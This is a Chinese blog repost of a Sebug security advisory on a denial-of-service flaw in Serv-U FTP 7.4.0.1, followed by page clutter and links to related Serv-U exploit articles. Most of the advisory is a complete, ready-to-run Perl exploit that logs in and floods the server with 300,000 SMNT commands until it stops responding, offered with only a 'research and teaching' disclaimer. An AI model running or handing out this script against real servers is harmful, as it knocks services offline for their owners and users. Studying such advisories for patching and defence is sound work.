软件显示无法连接服务器300000,Serv-U FTP服务器SMNT命令远程拒绝服务漏洞

最新推荐文章于 2024-06-16 16:46:59 发布
最新推荐文章于 2024-06-16 16:46:59 发布
阅读量364 收藏
点赞数
文章标签: 软件显示无法连接服务器300000

影响版本:

RhinoSoft Serv-U 7.4.0.1

漏洞描述:

BUGTRAQ  ID: 34127

Serv-U FTP是一款FTP服务程序。

如果远程攻击者向Serv-U FTP服务器发送特制SMNT请求的话,就可以导致服务器停止响应。

Jonathan Salwan (submit@shell-storm.org)

*>

SEBUG安全建议:

厂商补丁:

RhinoSoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.serv-u.com/

测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#!/usr/bin/perl

# Soft    : FTP Serv-U

# Version : v7.4.0.1

#

# Denial of Service in Serv-u up to 7.4.0.1 (no crash)

# Just the server is saturated, it stops responding.

#

# Author: Jonathan Salwan

# Mail: submit [AT] shell-storm.org

# Web: http://www.shell-storm.org

use IO::Socket;

print "[+] Author : Jonathan Salwan \n";

print "[+] Soft: FTP Serv-U\n";

if (@ARGV < 3)

{

print "[*] Usage: \n";

print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";

exit;

}

$ip  = $ARGV[0];

$port  = $ARGV[1];

$user = $ARGV[2];

$pass = $ARGV[3];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";

print "\n[+] Connecting: Ok!\n";

print "[+] Sending request...\n";

$evil = "SMNT\r\n" x 300000;

$after = "\x2A\x2A";

print $socket "USER $user\r\n";

print $socket "PASS $pass.$after\r\n";

print $socket "$evil";

sleep(1);

close($socket);

print "[+]Done! the server is saturated.\n";

weixin_39707612
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
serv-u建立ftp服务器实验报告.pdf
07-13
Serv-U FTP服务器搭建详解】 Serv-U是一款强大的FTP服务器软件,广泛应用于企业级的文件传输。本实验报告详细介绍了如何使用Serv-U建立FTP服务器,包括安装、配置和用户管理等关键步骤。 ### 1. 安装Serv-U ...
Serv-U漏洞以及原因分析(转)
cuanjun1153的博客
09-19 1261
Serv-U漏洞以及原因分析(转)[@more@]  Serv-U FTP Server远程拒绝服务漏洞以及原因分析  涉及程序版本:   Serv-U FTP Server v4.0.0.4(以前版本也可能存在该漏洞,没有测试...
CVE-2021-35211: SolarWinds Serv-U SSH 漏洞分析
HBohan的博客
09-07 2484
SolarWinds发布安全公告,修复了Serv-U中存在的远程代码执行漏洞(CVE-2021-35211),该漏洞为微软发现在野利用后向SolarWinds报告,并提供了漏洞利用的概念证明。未经身份验证的远程攻击者利用此漏洞可在受影响的服务器上以特殊权限执行任意代码,请相关用户尽快采取措施进行防护。 该漏洞存在于SSH协议中,与 SUNBURST 供应链攻击无关,仅影响SolarWinds Serv-U Managed File Transfer和Serv-U Secure FTP。使用Serv-U管理控
漏洞复现】SolarWinds Serv-U 目录遍历漏洞(CVE-2024-28995)
最新发布
siu~
06-16 510
Serv-U 的目录遍历漏洞(CVE-2024-28995)是由于在处理路径时缺乏适当的验证。攻击者可以通过传递包含 "../" 的路径段绕过路径验证,访问任意文件。
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1847
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
Serv-U服务器漏洞,黑客可远程执行程序
w3cschools的博客
09-07 1494
近日,微软已经分享了有关影响 SolarWinds Serv-U 托管文件传输服务的现已修复、积极利用的关键安全漏洞的技术细节。 该漏洞源于 Serv-U 实施的 Secure Shell (SSH) 协议,攻击者可以利用该漏洞运行任意代码在受感染的系统上,包括安装恶意程序以及查看、更改或删除敏感数据的能力。 知名网络安全专家、东方联盟创始人郭盛华在描述该漏洞的详细文章中说:“Serv-U SSH 服务器存在一个预认证远程代码执行漏洞,可以在默认配置中轻松可靠地利用该漏洞。黑客攻击者可以通过连接到开
网络安全漏洞深度剖析
kali_Ma的博客
10-16 4795
一、漏洞背景 2021年7月13日,美国微软威胁情报中心发布安全公告[1],文中指出黑客利用Serv-U 0day对极少数美国军工部门成功进行了攻击,同日Serv-U母公司solarwinds也发布安全公告[2],并针对最新大版本发布了补丁[3]。 (注意:目前发布的补丁只针对最新的15.2.3大版本,且只能是付费用户才能下载安装补丁,非付费用户目前无法从官方渠道获取有效补丁。) 根据补丁比较和fuzzer,宁静之盾安全团队成功复现了该远程溢出漏洞,并能在实战环境下成功利用。 截至9月10日,互联网上未发现
Serv-U 无法连接服务器127.0.0.1,端口43958 之解决办法
01-11
Serv-U无法连接服务器127.0.0.1,端口43958”的原因 始终搞不明白问题出在哪里,后上网查了资料,大概原因如下: 43958,这是Serv-U的本地管理端口,只允许127.0.0.1连接,这个端口不能连接,是因为: 1....
Serv-U 建立FTP服务器教程
01-10
安装完成后不需要重新启动计算机,用户就可以直接选择“开始”→“程序”→“Serv-U FTP Server”→“Serv-U Administrator”命令启动应用程序,并进行简单设置。下面我们以当前计算机(IP地址为192.168.0.1,域名为...
serv-u与屏保导致serv-u服务器经常停止无法连接的解决方法
01-10
u一直以来都有经常暂停无法连接的问题只有重新启动serv-u才能解决serv-u停止问题,还以为是版本或者流量的关系…… 查来查去终于发现是开启了“屏保”…… 把屏保程序关闭了,解决问题 如果关闭了屏保可以参考下面...
图解经典FTP服务器工具 SERV-U最安全的设置【防止被入侵】
01-11
作为一款精典的FTP服务器软件,SERV-U一直被大部分管理员所使用,它简单的安装和配置以及强大的管理功能的人性化也一直被管理员们称颂。但是随着使用者越来越多,该软件的安全问题也逐渐显露出来。  首先是SERV-U...
Serv-U漏洞解析 防患于未然 serv_u安全设置
09-30
Serv-U是一个极为强大的FTP服务器软件,而近两年不断爆出的各个版本的安全漏洞,却让大家在使用Serv-U时不得不多留个心眼。本文对Serv-U漏洞进行详细地分析,防患于未然,安全设置以后还是可以使用的
Serv-U防溢出提权攻击解决设置方法
01-20
前言: 大家应该都还没有忘记三年前在Serv-U5.004版的之前所有版本的”Serv-U FTPMDTM命令缓冲区溢出”与”Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞”吧,这个漏洞让很多服务器管理员立坐不安,也让很多大型的站点、甚至电信级的服务器沦陷了…随着Serv-U新版本的推出,这个漏同已经不存在了;虽然溢出不存在了,但黑客永远也没有停止,所以伴随着来的又是Serv-U5.0到6.0之黑客常用的本地提升权限缺陷。(注:最常见的就如webshell+su提权,我在 Baidu输入”Serv-U提权”关键词,搜索结果“百度一下,找到相关网页约34,000篇,用时0.
SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)
0xSec
06-14 1151
SolarWinds Serv-U 存在目录遍历漏洞(CVE-2024-28995),SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议企业尽快做好自查及防护。
犀牛系统连接服务器失败,犀牛5.0安装运行失败,Rhino安装失败解决方法
weixin_39535349的博客
08-12 6796
犀牛5.0安装运行失败,Rhino安装失败解决方法对于学习产品设计的同学来说,兴致高高的准备学习犀牛,然而现实却总是残酷,你会发现卡在犀牛安装的这一个准备阶段。诚然,每个人的电脑不一样,环境配置也是不一样的,所以这就导致了这样一个现实问题,犀牛5.0安装运行失败,这个时候应该怎么办呢?品索教育收集整理设计师在Rhino安装失败的常见问题及解决方法,欢迎收藏备用!安装犀牛软件,最好先清理一下注册表 ...
为什么显示网络连接不了服务器,为什么总显示网络连接错误or连接服务器失败?...
weixin_31111015的博客
08-12 2483
baomozhuai高分答主12-26TA获得超过9727个赞错误代码是什么?从ADSL拨号中出现的错误代码找问题所在:Error 602 The port is already open问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装Error 605 Cannot set port informati...
Serv-U权限提升再提升--记一次虚拟主机入侵
蓝法典的专栏
02-22 1756
 作者:intruder来源:邪恶八进制中国自从Serv-U本地权限提升漏洞出来以后,大家手握Su.exe这把网兜逢鸡就罩,一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中的方法流传广泛之后,大家手里开始有了些做虚拟主机的高带宽、大内存,甚至有N个CPU的极品肉鸡,恭喜恭喜啊^_^(台下观众:同喜同喜)。可是也遇见了用N多修补了这个Serv-U本地权限提升漏洞
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 768
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
Serv-U FTP服务器搭建与使用教程
"Serv-U是一款强大的FTP服务器软件,适用于多种Windows操作系统。它提供了详细的配置选项,包括设置多个FTP服务器、管理用户权限、指定登录主目录和空间大小等。Serv-U还支持SSLFTP,确保数据传输的安全性。本教程将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值